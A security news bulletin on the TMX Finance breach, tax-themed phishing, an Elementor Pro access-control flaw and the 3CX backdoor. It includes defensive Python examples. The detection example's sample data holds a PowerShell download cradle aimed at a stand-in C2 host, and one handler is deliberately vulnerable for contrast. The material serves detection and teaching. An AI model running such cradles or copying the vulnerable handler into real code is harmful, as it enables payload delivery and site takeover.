Malware Activity
TMX Finance Discloses Data Breach Impacting 4.8 Million Individuals
TMX Finance (TMX), along with a portion of its subsidiaries, collectively disclosed a data breach following a cyberattack that was discovered on February 13, 2023, after suspicious activity was observed. TMX's impacted subsidiaries consist of TitleMax (a leading car title loan company in the United States), TitleBucks (a company specializing in car title-secured loans or pawns as well as in-store or online personal loans), and InstaLoan (a fast-approval personal loan service). An investigation into this activity concluded that an unauthorized third party gained access to TMX systems on December 10, 2022, and that data belonging to approximately 4.8 million individuals was exfiltrated between February 3 and February 14, 2023. The company's data breach notice explains that the exfiltrated data includes names, dates of birth, passport numbers, driver's license numbers, federal/state identification card numbers, tax identification numbers, Social Security numbers (SSNs), financial account information, and additional data such as phone numbers, email addresses, and physical addresses. The actor responsible for the cyberattack and data breach of TMX has yet to claim responsibility, and TMX has not publicly attributed the attack to a specific threat group as of April 4, 2023. CTIX will continue to monitor the TMX Finance data breach and provide updates when available.
- The Record: TMX Finance Data Breach Article
- Office of the Maine Attorney General: TMX Finance Data Breach Notification Listing
Threat Actor Activity
Tactical Octopus Actors Target Users Ahead of Tax Deadlines
Recently, threat actors operating out of the Tactical Octopus organization have been observed targeting individuals throughout the United States with tax-themed phishing emails. These carefully crafted phishing emails utilize lure documents such as real estate contracts, I-9 forms, and W-2 forms to entice users into unknowingly downloading malicious payloads to their devices. The malicious code executes once the user extracts an attached password-protected .ZIP archive containing a malicious LNK file that enables the download of a .VBS (Visual Basic Script) file. During execution of the .VBS file, the malicious code reaches out to an actor-controlled command-and-control (C2) server to pull down additional payloads to the system. Heavily obfuscated to evade anti-virus applications, these malware files contain several lines of unrelated comments and phrases to throw off detection algorithms. Furthermore, additional obfuscated PowerShell commands are executed on the system and resemble code structures from a range of well-known malware such as Cobalt Strike and the "Kovter" RAT. IP addresses observed in C2 communications and malicious code show ties to Russian-hosted Internet Service Providers (ISPs), alongside some United States ISPs. CTIX urges users to validate the integrity of email correspondence prior to downloading any attachments or visiting embedded hyperlinks. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
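The delivery chain above (password-protected archive, LNK, VBS, C2 fetch, obfuscated PowerShell) leaves a recognisable parent/child trail in process-creation telemetry. The following is an added example, not code from the original report or from any vendor: it runs two detection rules over constructed Sysmon-style process events. The event fields, file paths, the `c2.example.invalid` host and the staging-directory list are all assumptions made for the illustration; the rules look for a script host launched from Explorer on a `.vbs` in a temp or download directory, and for PowerShell spawned by a script host that combines launch switches commonly used for hiding or bypass with a download-and-evaluate cradle (decoding an `-EncodedCommand` argument so the cradle is visible).

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 style, reduced to the fields used)."""
    pid: int
    ppid: int
    image: str      # executable path
    cmdline: str    # full command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Directories where an extracted attachment typically lands (assumed list, extend per environment).
STAGING_DIRS = re.compile(r"\\(temp|tmp|downloads|appdata\\local\\temp)\\", re.I)
VBS_ARG = re.compile(r'"?([^"\s]+\.vbs)"?', re.I)
# Launch switches that hide the window, skip the profile or bypass policy. None is malicious
# on its own, which is why the rule also requires a suspicious parent and a cradle.
PS_SWITCHES = re.compile(
    r"-(?:e|ec|enc|encodedcommand|w(?:indowstyle)?\s+hidden|nop|noprofile"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
PS_ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"
    r"|invoke-expression|\biex\b|frombase64string)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parent_of(events, ev):
    return next((p for p in events if p.pid == ev.ppid), None)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/undecodable."""
    m = PS_ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return None


def detect(events):
    """Apply both rules; returns (rule_name, pid) for every matching event, in event order."""
    findings = []
    for ev in events:
        name = basename(ev.image)
        parent = parent_of(events, ev)
        pname = basename(parent.image) if parent else ""
        # Rule 1: Explorer (the LNK double-click) starts a script host on a .vbs in a staging directory.
        if name in SCRIPT_HOSTS and pname == "explorer.exe":
            m = VBS_ARG.search(ev.cmdline)
            if m and STAGING_DIRS.search(m.group(1)):
                findings.append(("vbs_from_staging_dir", ev.pid))
        # Rule 2: the script host hands off to PowerShell with hide/bypass switches and a cradle.
        if name in POWERSHELL and pname in SCRIPT_HOSTS:
            decoded = decode_encoded_command(ev.cmdline) or ""
            if PS_SWITCHES.search(ev.cmdline) and CRADLE.search(ev.cmdline + " " + decoded):
                findings.append(("obfuscated_ps_download_cradle", ev.pid))
    return findings


def encode_ps(command):
    """PowerShell's -EncodedCommand format: base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for the demonstration; not real events.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
ADMIN_TASK = "Get-Service | Out-File C:\\logs\\svc.txt"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Benign: the user opens a document from Explorer.
    ProcessEvent(1010, 1000, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"WINWORD.EXE" "C:\Users\jdoe\Documents\W-2.docx"'),
    # Suspicious: the LNK inside the extracted archive runs wscript on the dropped VBS.
    ProcessEvent(1020, 1000, r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\jdoe\AppData\Local\Temp\Temp1_Tax_Documents.zip\W-2_form.vbs"'),
    # Suspicious: the VBS launches hidden, encoded PowerShell that fetches the next stage.
    ProcessEvent(1030, 1020, PS_EXE, "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE2)),
    # Benign: encoded PowerShell from a scheduled task; same switch, but no script-host parent.
    ProcessEvent(1040, 4, PS_EXE, "powershell.exe -enc " + encode_ps(ADMIN_TASK)),
    # Benign: a logon script run by the script host from a non-staging path.
    ProcessEvent(1050, 1000, r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "\\corp.example.invalid\netlogon\map_drives.vbs"'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the two events that form the chain are flagged; the scheduled-task PowerShell and the logon script are left alone because each rule requires the parent relationship as well as the command-line indicators. Tune the staging-directory list and the cradle keywords to the environment before deploying anything like this.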
Vulnerabilities
Actively Exploited Flaw in WordPress Plugin Allows for Full Site Takeover
Hackers are actively exploiting a critical vulnerability in Elementor Pro, a popular website builder plugin for WordPress with at least 11 million installs. The flaw was discovered by a researcher from NinTechNet, who published a working proof-of-concept (PoC) exploit at the end of March 2023. The exploit only affects instances of Elementor Pro running on a website that has WooCommerce activated. WooCommerce is a widely used open-source software solution for turning websites into online e-commerce shops. The exploit stems from a broken access control vulnerability that allows any authenticated user visiting the website to make changes to the website's settings, potentially allowing the attacker to conduct a full takeover of the site. If successfully exploited, an authenticated attacker could elevate their privileges to make themselves a website administrator. This would allow them to carry out a number of malicious activities, including redirecting all user traffic to an actor-controlled command-and-control (C2) server, as well as uploading backdoors and other malicious code. This vulnerability impacts v3.11.6 and earlier, and CTIX analysts recommend that all site administrators running vulnerable instances of Elementor Pro and WooCommerce upgrade to version 3.11.7 or later as soon as possible.
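The flaw belongs to a class worth seeing side by side: a settings endpoint that checks only *that* the caller is logged in, next to one that checks *who* may change *which* setting. The code below is an added, generic illustration written for this page; it is not Elementor Pro's or WordPress's code and does not reproduce the published PoC. The `User`/`Site` model, the option names, the `manage_options` capability string (borrowed from WordPress's capability vocabulary) and the HMAC request token standing in for a nonce are all assumptions of the example. The hardened handler adds three gates the vulnerable one lacks: a per-user request token, a capability check, and an allow-list of the option keys this endpoint legitimately needs to write.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field


class AccessDenied(Exception):
    """Raised when a caller may not perform the requested settings change."""


@dataclass
class User:
    username: str
    capabilities: frozenset   # e.g. {"read"} for a low-privilege account


@dataclass
class Site:
    # Constructed sample settings; the keys are illustrative, not a real plugin's option names.
    options: dict = field(default_factory=lambda: {
        "site_title": "Example Shop",
        "registration_open": False,
        "new_user_role": "customer",
    })
    csrf_secret: bytes = field(default_factory=lambda: secrets.token_bytes(32))


# The only option this particular endpoint exists to manage (least privilege for the endpoint itself).
SETTINGS_ENDPOINT_ALLOWLIST = frozenset({"site_title"})


def issue_csrf_token(site, user):
    """Per-user token bound to the action, a simplified stand-in for a WordPress nonce."""
    msg = f"update_settings:{user.username}".encode()
    return hmac.new(site.csrf_secret, msg, hashlib.sha256).hexdigest()


def update_settings_vulnerable(site, user, changes):
    """VULNERABLE: authentication is the only gate. Any logged-in account, however
    low-privileged, can rewrite any option, including ones that govern who becomes an admin."""
    if user is None:
        raise AccessDenied("login required")
    site.options.update(changes)
    return site.options


def update_settings_hardened(site, user, changes, csrf_token):
    """HARDENED: authenticate, verify the request token, authorise by capability,
    and restrict writes to the keys this endpoint is meant to manage."""
    if user is None:
        raise AccessDenied("login required")
    if not hmac.compare_digest(csrf_token or "", issue_csrf_token(site, user)):
        raise AccessDenied("bad or missing request token")
    if "manage_options" not in user.capabilities:
        raise AccessDenied("manage_options capability required")
    out_of_scope = set(changes) - SETTINGS_ENDPOINT_ALLOWLIST
    if out_of_scope:
        raise AccessDenied(f"option(s) not writable via this endpoint: {sorted(out_of_scope)}")
    site.options.update(changes)
    return site.options


def demo():
    """Run the same privilege-relevant change through both handlers and report what happened."""
    low_priv = User("customer1", frozenset({"read"}))
    admin = User("owner", frozenset({"read", "manage_options"}))
    attempt = {"registration_open": True, "new_user_role": "administrator"}
    results = {}

    site = Site()
    update_settings_vulnerable(site, low_priv, attempt)
    results["vulnerable_low_priv_changed_role"] = site.options["new_user_role"]

    site = Site()
    cases = {
        "hardened_low_priv": (low_priv, issue_csrf_token(site, low_priv), attempt),
        "hardened_admin_out_of_scope": (admin, issue_csrf_token(site, admin), attempt),
        "hardened_admin_no_token": (admin, None, {"site_title": "New"}),
    }
    for label, (user, token, changes) in cases.items():
        try:
            update_settings_hardened(site, user, changes, token)
            results[label] = "allowed"
        except AccessDenied:
            results[label] = "denied"
    results["hardened_admin_in_scope"] = update_settings_hardened(
        site, admin, {"site_title": "Example Shop v2"}, issue_csrf_token(site, admin))["site_title"]
    results["hardened_role_unchanged"] = site.options["new_user_role"]
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label}: {outcome}")
```

The point of the allow-list is that even an administrator with a valid token cannot use this endpoint to touch options outside its purpose; a settings handler should be able to change only what its feature needs, so a future capability-check regression has a smaller blast radius.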
Honorable Mention
3CX Breach Widens as Second-Stage Backdoor Drops
UPDATE: The adversary targeting 3CX in a supply-chain attack has employed a second-stage backdoor by exploiting CVE-2013-3900, a ten (10) year-old Windows vulnerability. The threat actor has been observed delivering their full-fledged modular backdoor to only a few select companies. This versatile backdoor, known as "Gopuram", was deployed on fewer than ten (10) devices, primarily belonging to cryptocurrency companies. It is still believed that the Lazarus group, a North Korean state-sponsored hacking group, was behind the initial 3CX attack. The precision of the attacks and their specific aim at cryptocurrency companies further ties the North Korean government-backed hackers to the crime, as the sanctions-hit government has a history of illicitly targeting cryptocurrency and other financial assets to help fund its cyber operations. This deployment of a second backdoor aimed specifically at crypto targets helps clarify the intent of the initial attackers and suggests that this was the final payload of the attack chain.
- Security Week: 3CX Backdoor Article
- The Hacker News: 3CX Backdoor Article
- Bleeping Computer: 3CX Backdoor Article
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.